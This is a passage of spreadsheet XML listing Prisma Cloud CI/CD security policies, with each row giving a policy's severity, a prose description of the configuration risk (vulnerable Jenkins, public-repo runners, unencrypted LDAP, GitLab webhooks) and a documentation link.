          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB286" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC286" t="inlineStr"/>
      <c r="AD286" t="b">
        <v>1</v>
      </c>
      <c r="AE286" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF286" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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6" t="inlineStr">
        <is>
          <t>1ce976a6-7319-40d4-851c-5394cb48aa4c</t>
        </is>
      </c>
      <c r="AI286" t="inlineStr"/>
      <c r="AJ286" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK286" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" t="inlineStr"/>
      <c r="B287" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C287" s="2" t="inlineStr"/>
      <c r="D287" t="inlineStr"/>
      <c r="E287" t="inlineStr"/>
      <c r="F287" t="inlineStr"/>
      <c r="G287" t="b">
        <v>1</v>
      </c>
      <c r="H2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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J287" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="K287" t="inlineStr">
        <is>
          <t>Vulnerable Jenkins version in use</t>
        </is>
      </c>
      <c r="L287" t="inlineStr"/>
      <c r="M287" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N287" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O287" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P287" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q287" t="inlineStr"/>
      <c r="R287" t="inlineStr"/>
      <c r="S287" t="inlineStr"/>
      <c r="T287" t="b">
        <v>0</v>
      </c>
      <c r="U287" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V287" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="W287" t="inlineStr">
        <is>
          <t>Jenkins Core version in use has known vulnerabilities which may be exploited by an adversary with access to the system.</t>
        </is>
      </c>
      <c r="X287" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-vuln-version</t>
        </is>
      </c>
      <c r="Y287" t="inlineStr"/>
      <c r="Z287" t="inlineStr">
        <is>
          <t>{"category":"System Configuration","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA287" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB287" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC287" t="inlineStr"/>
      <c r="AD287" t="b">
        <v>1</v>
      </c>
      <c r="AE287" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF287" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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7" t="inlineStr">
        <is>
          <t>699853b5-52ff-4c05-8ba1-816561aebb1d</t>
        </is>
      </c>
      <c r="AI287" t="inlineStr"/>
      <c r="AJ287" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK287" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" t="inlineStr"/>
      <c r="B288" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C288" s="2" t="inlineStr"/>
      <c r="D288" t="inlineStr"/>
      <c r="E288" t="inlineStr"/>
      <c r="F288" t="inlineStr"/>
      <c r="G288" t="b">
        <v>1</v>
      </c>
      <c r="H2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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J288" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="K288" t="inlineStr">
        <is>
          <t>Self-hosted runner group allows public repositories</t>
        </is>
      </c>
      <c r="L288" t="inlineStr"/>
      <c r="M288" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N288" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O288" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P288" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q288" t="inlineStr"/>
      <c r="R288" t="inlineStr"/>
      <c r="S288" t="inlineStr"/>
      <c r="T288" t="b">
        <v>0</v>
      </c>
      <c r="U288" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V288" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="W288" t="inlineStr">
        <is>
          <t>Using a self-hosted runner with a public GitHub repository carries significant security risks, due to the fact that self-hosted runners are naturally less secure, as you have to design and maintain a secure solution for the runner. An attacker who forks public repositories can potentially run malicious code on self-hosted runners by creating a pull request that triggers a workflow, achieving persistence on the runner and access to local files and leftover secrets, as well as accessing internal infrastructure.</t>
        </is>
      </c>
      <c r="X288" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-selfhosted-runner-group-allows-public-repos</t>
        </is>
      </c>
      <c r="Y288" t="inlineStr"/>
      <c r="Z288" t="inlineStr">
        <is>
          <t>{"category":"System Configuration","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA288" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB288" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC288" t="inlineStr"/>
      <c r="AD288" t="b">
        <v>1</v>
      </c>
      <c r="AE288" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF288" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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8" t="inlineStr">
        <is>
          <t>98b5ca1e-c513-4984-bc34-9892147aa3fe</t>
        </is>
      </c>
      <c r="AI288" t="inlineStr"/>
      <c r="AJ288" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK288" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" t="inlineStr"/>
      <c r="B289" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C289" s="2" t="inlineStr"/>
      <c r="D289" t="inlineStr"/>
      <c r="E289" t="inlineStr"/>
      <c r="F289" t="inlineStr"/>
      <c r="G289" t="b">
        <v>1</v>
      </c>
      <c r="H2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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J289" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="K289" t="inlineStr">
        <is>
          <t>Public and private repositories connected to shared CI system</t>
        </is>
      </c>
      <c r="L289" t="inlineStr"/>
      <c r="M289" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N289" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O289" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P289" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q289" t="inlineStr"/>
      <c r="R289" t="inlineStr"/>
      <c r="S289" t="inlineStr"/>
      <c r="T289" t="b">
        <v>0</v>
      </c>
      <c r="U289" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V289" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="W289" t="inlineStr">
        <is>
          <t>A CI system is connected with both private and public repositories. Any CI system that runs code from public repositories is potentially vulnerable to a variety of attacks, from execution of malicious code in a build, to credential theft, through abuse of webhooks. Private repositories and their pipelines tend to be more sensitive, and attackers that gain any type of control on the shared CI system might be able to access restricted resources, view application code, or exfiltrate stored credentials.</t>
        </is>
      </c>
      <c r="X289" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/cross-platform-cicd-pipeline-policies/cp-pub-private-repo-connect-share-ci-system</t>
        </is>
      </c>
      <c r="Y289" t="inlineStr"/>
      <c r="Z289" t="inlineStr">
        <is>
          <t>{"category":"System Configuration","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA289" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB289" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC289" t="inlineStr"/>
      <c r="AD289" t="b">
        <v>1</v>
      </c>
      <c r="AE289" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF289" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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9" t="inlineStr">
        <is>
          <t>52d503c5-4449-4d3d-abd5-1459ee568e8b</t>
        </is>
      </c>
      <c r="AI289" t="inlineStr"/>
      <c r="AJ289" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK289" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" t="inlineStr"/>
      <c r="B290" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C290" s="2" t="inlineStr"/>
      <c r="D290" t="inlineStr"/>
      <c r="E290" t="inlineStr"/>
      <c r="F290" t="inlineStr"/>
      <c r="G290" t="b">
        <v>1</v>
      </c>
      <c r="H2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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J290" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="K290" t="inlineStr">
        <is>
          <t>Jenkins instance traffic sent over an unencrypted channel</t>
        </is>
      </c>
      <c r="L290" t="inlineStr"/>
      <c r="M290" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N290" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O290" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P290" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q290" t="inlineStr"/>
      <c r="R290" t="inlineStr"/>
      <c r="S290" t="inlineStr"/>
      <c r="T290" t="b">
        <v>0</v>
      </c>
      <c r="U290" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V290" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="W290" t="inlineStr">
        <is>
          <t>Traffic of the Jenkins instance is sent over an unencrypted layer. An attacker can perform a Man In The Middle attack to collect sensitive information, such as credentials or application code, or to modify the data sent to/from the instance to perform malicious actions.</t>
        </is>
      </c>
      <c r="X290" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-traffic-transmit-unencrypted</t>
        </is>
      </c>
      <c r="Y290" t="inlineStr"/>
      <c r="Z290" t="inlineStr">
        <is>
          <t>{"category":"System Configuration","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA290" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB290" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC290" t="inlineStr"/>
      <c r="AD290" t="b">
        <v>1</v>
      </c>
      <c r="AE290" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF290" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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0" t="inlineStr">
        <is>
          <t>caadf751-fad1-4706-a808-ac95d1e3f252</t>
        </is>
      </c>
      <c r="AI290" t="inlineStr"/>
      <c r="AJ290" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK290" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" t="inlineStr"/>
      <c r="B291" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C291" s="2" t="inlineStr"/>
      <c r="D291" t="inlineStr"/>
      <c r="E291" t="inlineStr"/>
      <c r="F291" t="inlineStr"/>
      <c r="G291" t="b">
        <v>1</v>
      </c>
      <c r="H2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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J291" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="K291" t="inlineStr">
        <is>
          <t>LDAP in Jenkins is configured to use an unencrypted channel</t>
        </is>
      </c>
      <c r="L291" t="inlineStr"/>
      <c r="M291" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N291" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O291" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P291" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q291" t="inlineStr"/>
      <c r="R291" t="inlineStr"/>
      <c r="S291" t="inlineStr"/>
      <c r="T291" t="b">
        <v>0</v>
      </c>
      <c r="U291" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V291" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="W291" t="inlineStr">
        <is>
          <t>The LDAP protocol is used in the Jenkins instance for the authentication of users. This instance is communicating with the remote LDAP server over an unencrypted channel. This allows attackers to perform a Man In The Middle attack and intercept the LDAP traffic, which may lead to bypassing the authentication mechanism and gaining control over the Jenkins instance.</t>
        </is>
      </c>
      <c r="X291" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-ldap-use-unencrypted-channel</t>
        </is>
      </c>
      <c r="Y291" t="inlineStr"/>
      <c r="Z291" t="inlineStr">
        <is>
          <t>{"category":"System Configuration","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA291" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB291" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC291" t="inlineStr"/>
      <c r="AD291" t="b">
        <v>1</v>
      </c>
      <c r="AE291" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF291" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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1" t="inlineStr">
        <is>
          <t>95bfd1a2-4335-4a8d-8b06-a8a5a5c69ad1</t>
        </is>
      </c>
      <c r="AI291" t="inlineStr"/>
      <c r="AJ291" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK291" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" t="inlineStr"/>
      <c r="B292" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C292" s="2" t="inlineStr"/>
      <c r="D292" t="inlineStr"/>
      <c r="E292" t="inlineStr"/>
      <c r="F292" t="inlineStr"/>
      <c r="G292" t="b">
        <v>1</v>
      </c>
      <c r="H2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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J292" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="K292" t="inlineStr">
        <is>
          <t>Vulnerable Jenkins plugins</t>
        </is>
      </c>
      <c r="L292" t="inlineStr"/>
      <c r="M292" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N292" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O292" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P292" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q292" t="inlineStr"/>
      <c r="R292" t="inlineStr"/>
      <c r="S292" t="inlineStr"/>
      <c r="T292" t="b">
        <v>0</v>
      </c>
      <c r="U292" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V292" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="W292" t="inlineStr">
        <is>
          <t>Jenkins plugins, that run on the Jenkins master node, possess known vulnerabilities which might be exploited by an adversary with access to Jenkins.</t>
        </is>
      </c>
      <c r="X292" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-vuln-plugins</t>
        </is>
      </c>
      <c r="Y292" t="inlineStr"/>
      <c r="Z292" t="inlineStr">
        <is>
          <t>{"category":"System Configuration","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA292" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB292" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC292" t="inlineStr"/>
      <c r="AD292" t="b">
        <v>1</v>
      </c>
      <c r="AE292" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF292" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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2" t="inlineStr">
        <is>
          <t>f3839da2-1df3-4fd9-ad8d-427912f03d5c</t>
        </is>
      </c>
      <c r="AI292" t="inlineStr"/>
      <c r="AJ292" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK292" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" t="inlineStr"/>
      <c r="B293" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C293" s="2" t="inlineStr"/>
      <c r="D293" t="inlineStr"/>
      <c r="E293" t="inlineStr"/>
      <c r="F293" t="inlineStr"/>
      <c r="G293" t="b">
        <v>1</v>
      </c>
      <c r="H2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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J293" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="K293" t="inlineStr">
        <is>
          <t>Push restrictions are not enforced on the default branch in GitHub</t>
        </is>
      </c>
      <c r="L293" t="inlineStr"/>
      <c r="M293" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N293" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O293" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P293" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q293" t="inlineStr"/>
      <c r="R293" t="inlineStr"/>
      <c r="S293" t="inlineStr"/>
      <c r="T293" t="b">
        <v>0</v>
      </c>
      <c r="U293" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V293" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="W293" t="inlineStr">
        <is>
          <t>IP allow lists enable admins to restrict access to the organization's assets by listing IP/CIDR addresses that are allowed to access the organization's resources. If an allow list is not configured, a malicious actor who has compromised an access token could access the organization's resources from any IP address.</t>
        </is>
      </c>
      <c r="X293" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-push-restrictions-not-enforced</t>
        </is>
      </c>
      <c r="Y293" t="inlineStr"/>
      <c r="Z293" t="inlineStr">
        <is>
          <t>{"category":"System Configuration","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA293" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB293" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC293" t="inlineStr"/>
      <c r="AD293" t="b">
        <v>1</v>
      </c>
      <c r="AE293" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF293" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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3" t="inlineStr">
        <is>
          <t>3e9d9ff6-cfd2-4eba-8c55-b566f4334b9e</t>
        </is>
      </c>
      <c r="AI293" t="inlineStr"/>
      <c r="AJ293" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK293" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" t="inlineStr"/>
      <c r="B294" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C294" s="2" t="inlineStr"/>
      <c r="D294" t="inlineStr"/>
      <c r="E294" t="inlineStr"/>
      <c r="F294" t="inlineStr"/>
      <c r="G294" t="b">
        <v>1</v>
      </c>
      <c r="H2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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J294" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="K294" t="inlineStr">
        <is>
          <t>Access to resources on the GitLab server from GitLab services is not restricted</t>
        </is>
      </c>
      <c r="L294" t="inlineStr"/>
      <c r="M294" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N294" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O294" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P294" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q294" t="inlineStr"/>
      <c r="R294" t="inlineStr"/>
      <c r="S294" t="inlineStr"/>
      <c r="T294" t="b">
        <v>0</v>
      </c>
      <c r="U294" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V294" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="W294" t="inlineStr">
        <is>
          <t>The self-managed GitLab system is vulnerable to exploitation via webhooks. User accounts can create webhooks on the system, and these webhook events are sent from the GitLab server itself. Malicious user accounts can abuse the webhooks mechanism to send requests to services on the local GitLab server, or to addresses on the internal network which are accessible from the GitLab server. Sending these requests might allow to expose data and perform operations on these services.</t>
        </is>
      </c>
      <c r="X294" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-access-server-unrestricted</t>
        </is>
      </c>
      <c r="Y294" t="inlineStr"/>
      <c r="Z294" t="inlineStr">
        <is>
          <t>{"category":"System Configuration","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA294" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB294" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC294" t="inlineStr"/>
      <c r="AD294" t="b">
        <v>1</v>
      </c>
      <c r="AE294" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF294" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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4" t="inlineStr">
        <is>
          <t>c22dc1ff-86ea-4de5-b10b-5759bc9f34ca</t>
        </is>
      </c>
      <c r="AI294" t="inlineStr"/>
      <c r="AJ294" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK294" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" t="inlineStr"/>
      <c r="B295" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C295" s="2" t="inlineStr"/>
      <c r="D295" t="inlineStr"/>
      <c r="E295" t="inlineStr"/>
      <c r="F295" t="inlineStr"/>
      <c r="G295" t="b">
        <v>1</v>
      </c>
      <c r="H2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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J295" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="K295" t="inlineStr">
        <is>
          <t>GitHub organization's identity not confirmed with a verified badge</t>
        </is>
      </c>
      <c r="L295" t="inlineStr"/>
      <c r="M295" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N295" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O295" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P295" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q295" t="inlineStr"/>
      <c r="R295" t="inlineStr"/>
      <c r="S295" t="inlineStr"/>
      <c r="T295" t="b">
        <v>0</v>
      </c>
      <c r="U295" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V295" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="W295" t="inlineStr">
        <is>
          <t>As the organization domain name is not verified, GitHub does not display a Verified Badge for it. Verifying a domain name with GitHub provides an additional layer of integrity to your organization by displaying a Verified Badge on the organization's profile, building trust and confidence both inside and outside of the organization.</t>
        </is>
      </c>
      <c r="X295" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-org-identity-notverified-badge</t>
        </is>
      </c>
      <c r="Y295" t="inlineStr"/>
      <c r="Z295" t="inlineStr">
        <is>
          <t>{"category":"System Configuration","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA295" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB295" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC295" t="inlineStr"/>
      <c r="AD295" t="b">
        <v>1</v>
      </c>
      <c r="AE295" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF295" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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5" t="inlineStr">
        <is>
          <t>cbadaed7-2b2e-4e0a-a33d-1487e1ba406d</t>
        </is>
      </c>
      <c r="AI295" t="inlineStr"/>
      <c r="AJ295" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK295" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" t="inlineStr"/>
      <c r="B296" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C296" s="2" t="inlineStr"/>
      <c r="D296" t="inlineStr"/>
      <c r="E296" t="inlineStr"/>
      <c r="F296" t="inlineStr"/>
      <c r="G296" t="b">
        <v>1</v>
      </c>
      <c r="H2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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J296" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="K296" t="inlineStr">
        <is>
          <t>GitHub Actions is enabled and not used in a GitHub repository</t>
        </is>
      </c>
      <c r="L296" t="inlineStr"/>
      <c r="M296" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N296" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O296" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P296" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q296" t="inlineStr"/>
      <c r="R296" t="inlineStr"/>
      <c r="S296" t="inlineStr"/>
      <c r="T296" t="b">
        <v>0</v>
      </c>
      <c r="U296" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V296" t="inlineStr">
        <is>
          <t>CI/CD:System Configuration:</t>
        </is>
      </c>
      <c r="W296" t="inlineStr">
        <is>
          <t>GitHub Actions is the CI solution offered by GitHub, allowing to execute code within the context of GitHub repositories. Actions is enabled by default in any GitHub organization, and in any repository. As any organization member can run workflows execute actions against repository code, and interact with the GitHub API from within the workflow - including API actions that require Write permissions, GitHub Actions serves as a surface for potential attacks against the repository and organization, even if the service is not in use in the organization or repository.</t>
        </is>
      </c>
      <c r="X296" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gha-enabled-unused</t>
        </is>
      </c>
      <c r="Y296" t="inlineStr"/>
      <c r="Z296" t="inlineStr">
        <is>
          <t>{"category":"System Configuration","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA296" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
